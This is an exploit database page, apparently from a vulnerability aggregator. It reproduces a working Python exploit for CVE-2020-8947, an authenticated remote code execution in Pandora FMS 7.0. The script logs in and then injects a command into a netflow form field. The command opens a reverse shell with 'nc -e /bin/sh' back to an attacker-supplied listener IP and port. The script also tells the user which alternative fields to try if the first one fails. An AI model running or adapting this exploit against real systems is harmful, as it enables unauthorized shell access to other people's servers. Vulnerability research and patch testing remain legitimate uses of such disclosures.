Lucene search
Engin DemirbilekEXPLOITPACK:62C6A29C3DF356CC95FF87F85A6C5205HistoryFeb 13, 2020 - 12:00 a.m.
PANDORAFMS 7.0 - Authenticated Remote Code Execution
2020-02-1300:00:00
Engin Demirbilek
29
0.104 Low
EPSS
Percentile
95.0%
PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947
#!/bin/python
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port
Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947
'''
import requests
import sys
if len(sys.argv) < 6:
print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
login = {
'nick':user,
'pass':password,
'login_button':'Login'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/pandora_console/index.php?login=1", data=login)
payload = {
'date':"",
'time':"",
'period':"",
'interval_length':"",
'chart_type':"",
'max_aggregates':"1",
'address_resolution':"0",
'name':"",
'assign_group':"0",
'filter_type':"0",
'filter_id':"0",
'filter_selected':"0",
'ip_dst':payload,
'ip_src':"",
'dst_port':"",
'src_port':"",
'advanced_filter':"",
'aggregate':"dstip",
'router_ip':"",
'output':"bytes",
'draw_button':"Draw"
}
print "[+] Sendin exploit ..."
exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'})
if exploit.status_code == 200:
print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
else:
print "[-] Couldn't send the HTTP request, try again."Related
packetstorm
packetstorm
Pandora FMS 7.0 Authenticated Remote Code Execution
2020-02-13 00:00:00
zdt
zdt
PANDORAFMS 7.0 - Authenticated Remote Code Execution Exploit
2020-02-13 00:00:00
exploitdb
exploitdb
PANDORAFMS 7.0 - Authenticated Remote Code Execution
2020-02-13 00:00:00
prion
prion
Design/Logic Flaw
2020-02-12 18:15:00
cvelist
cvelist
CVE-2020-8947
2020-02-12 17:52:37
cve
cve
CVE-2020-8947
2020-02-12 18:15:10
nvd
nvd
CVE-2020-8947
2020-02-12 18:15:10